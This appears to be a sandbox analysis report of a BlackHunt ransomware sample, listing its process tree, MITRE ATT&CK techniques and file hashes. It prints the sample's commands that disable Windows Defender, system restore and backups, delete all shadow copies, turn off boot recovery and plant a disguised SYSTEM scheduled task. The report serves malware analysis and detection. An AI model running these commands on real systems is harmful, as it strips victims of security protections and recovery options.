    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe  [2]  PID 3412
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe  [2]  PID 2164
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe  [2]  PID 916
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe  [2]  PID 468
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe  [2]  PID 3932
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe  [2]  PID 2132
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f

  C:\Windows\System32\cmd.exe  [2]  PID 5008
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f

  C:\Windows\System32\cmd.exe  [2]  PID 2408
    "C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4440
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:964
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f2⤵
- Suspicious use of WriteProcessMemory
PID:4272
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
PID:864
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3328
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3800
-
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f1⤵
- Modifies registry class
PID:1676
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Low" /t REG_DWORD /d 6 /f1⤵PID:2884
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Spynet" /v "SubmitSamplesConsent" /t REG_DWORD /d 2 /f1⤵PID:2976
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats" /v "Threats_ThreatSeverityDefaultAction" /t REG_DWORD /d 1 /f1⤵PID:4912
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v "StartMenuLogOff" /t REG_DWORD /d 1 /f1⤵PID:2948
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableChangePassword" /t REG_DWORD /d 1 /f1⤵PID:2316
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵PID:2412
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled No1⤵
- Modifies boot configuration data using bcdedit
PID:1568
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3100
-
C:\Windows\system32\vssadmin.exevssadmin.exe Delete Shadows /all /quiet1⤵
- Interacts with shadow copies
PID:468
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=unbounded1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:1600
-
C:\Windows\system32\vssadmin.exevssadmin resize shadowstorage /for=F:\ /on=F:\ /maxsize=401MB1⤵
- Enumerates connected drives
- Interacts with shadow copies
PID:3084
-
C:\Windows\system32\schtasks.exeSCHTASKS.exe /Create /RU "NT AUTHORITY\SYSTEM" /sc onstart /TN "Windows Critical Update" /TR "C:\Users\Admin\AppData\Local\Temp\9dd327962921fb6604b1359ae4c41e2b8cc6c65567dfb7a10c03189aa7ead4a1.exe" /F1⤵
- Creates scheduled task(s)
PID:4864
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupUI" /t REG_DWORD /d 1 /f1⤵PID:4736
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableRestoreUI" /t REG_DWORD /d 1 /f1⤵PID:3272
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\WinRE" /v "DisableSetup" /t REG_DWORD /d 1 /f1⤵PID:2884
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableBackupLauncher" /t REG_DWORD /d 1 /f1⤵PID:3252
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d 1 /f1⤵PID:2564
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d 1 /f1⤵PID:636
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client" /v "DisableSystemBackupUI" /t REG_DWORD /d 1 /f1⤵PID:4380
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "NoLogoff" /t REG_DWORD /d 1 /f1⤵PID:2768
-
C:\Windows\system32\reg.exereg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableLockWorkstation" /t REG_DWORD /d 1 /f1⤵
- Suspicious use of WriteProcessMemory
PID:1244
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\UX Configuration" /v "Notification_Suppress" /t REG_DWORD /d 1 /f1⤵PID:2268
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Severe" /t REG_DWORD /d 6 /f1⤵PID:3936
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Threats\ThreatSeverityDefaultAction" /v "Medium" /t REG_DWORD /d 6 /f1⤵PID:3456
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /f1⤵
- Modifies Windows Defender Real-time Protection settings
PID:1092
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f1⤵
- Modifies registry class
PID:3644
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV11⤵PID:4168
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5816
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:5272
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:1116
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc1⤵PID:1908
Network
MITRE ATT&CK Enterprise v15

Persistence
  - Boot or Logon Autostart Execution (1)
      - Registry Run Keys / Startup Folder (1)
  - Create or Modify System Process (1)
      - Windows Service (1)
  - Scheduled Task/Job (1)

Privilege Escalation
  - Abuse Elevation Control Mechanism (1)
      - Bypass User Account Control (1)
  - Boot or Logon Autostart Execution (1)
      - Registry Run Keys / Startup Folder (1)
  - Create or Modify System Process (1)
      - Windows Service (1)
  - Scheduled Task/Job (1)

Defense Evasion
  - Abuse Elevation Control Mechanism (1)
      - Bypass User Account Control (1)
  - Impair Defenses (2)
      - Disable or Modify Tools (2)
  - Indicator Removal (3)
      - File Deletion (3)
  - Modify Registry (4)
Downloads

- Filesize: 1KB
  MD5:    2017102d151a40296b1572d19f9a260c
  SHA1:   24f734aec273ab36091f70eaef4fbcf519ba2876
  SHA256: abdde33cd5b1f8dbfb706137c70be0f6bf21d3ed3c055cd692eecdfd0f5497d6
  SHA512: 9561b73f55222b1e961158f4c6903417235104d73a42cc7eadf19897af46f98eaa83b491977fe0b8e1fff230fdc137a90a6e17810d3d4c04a5f6e4920f1e9088

- Filesize: 684B
  MD5:    69e48c9245d179af90fdf2e8e9e91398
  SHA1:   d88f19b209731740bfe85a92e35cc4d0ec42ecab
  SHA256: 89422e2e9695b25c93be9035712d953b8baa91d3e690f89ae8fb316914e4cf34
  SHA512: 7842ca8b143f0c5b759ca84441e7326cf42e0f89bbf1323e2f3f69e8d5daba22fcd08a45c0156c8f277edac43fb5f816e805606d0a8a5ee9be8ed7a2a563adc0

- Filesize: 12KB
  MD5:    ef26c47882f537c09f1d9b59b35e97cc
  SHA1:   34bdfbd69bd066acd02dc3bfee8aa907590ee148
  SHA256: 5eaffcc443075a4619fbf64e3f55ff7cccc7a5e6b052ad4ebee6a64e7165824c
  SHA512: 370d8d6076615057362aefde988b4009983d7bf39249d47dc1c9870fcea87993ee1a74798d72b8c1609e6d33530901fe30c6b85b5c2d8b90f45843d73adf7de2